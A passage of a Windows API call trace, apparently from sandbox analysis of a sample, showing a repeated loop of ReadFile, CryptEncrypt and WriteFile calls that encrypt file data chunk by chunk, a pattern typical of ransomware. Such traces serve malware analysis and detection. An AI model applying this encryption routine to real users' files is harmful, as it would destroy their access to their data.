lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.829] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.829] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.829] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.829] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.829] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.830] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.830] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.830] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.830] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.830] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.830] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.830] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.830] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.831] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.831] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.831] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.831] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.831] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.832] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.832] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.832] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.832] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.832] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.833] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.833] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.833] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.833] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.834] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.834] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.834] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.834] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.834] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.834] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.834] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.834] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.835] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.835] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.835] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.835] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.835] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.835] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.835] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.836] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.836] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.836] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.836] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.837] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.837] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.837] CryptEncrypt (in: hKey=0x2fab88, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.837] ReadFile (in: hFile=0x5d48, 